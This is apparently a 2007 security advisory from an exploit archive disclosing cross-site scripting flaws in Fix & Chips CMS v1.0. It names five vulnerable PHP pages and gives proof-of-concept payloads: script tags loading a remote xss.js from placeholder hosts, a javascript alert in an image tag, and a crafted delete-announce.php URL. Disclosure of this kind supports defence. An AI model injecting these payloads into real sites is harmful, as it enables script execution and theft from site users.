Fix & Chips CMS v1.0

2007.01.09
Credit: Luny
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Fix & Chips CMS v1.0 http://software.fixnchipsit.com/ Vulnerable files: staff.php delete-announce.php new-customer.php search.php client-results.php -------------------------------------------- staff.php XSS User input in the Announcement box isn't properly sanatized before being generated. A few PoC's that work: <SCRIPT SRC=http://somesite.com/xss.js></SCRIPT> <IMG SRC=javascript:alert("XSS")> ---------------------------------------------- delete-announce.php XSS http://www.example.com/delete-announce.php?id=<SCRIPT%20SRC=example.com/ xss.js></SCRIPT> ------------------------------------------------- new-customer.php User input in all of the input boxes when adding a new customer isnt sanatized. For a PoC in any input box when adding a new client put: <SCRIPT SRC=http://example.com/xss.js></SCRIPT> Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well. ------------------------------------------------ - Luny


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top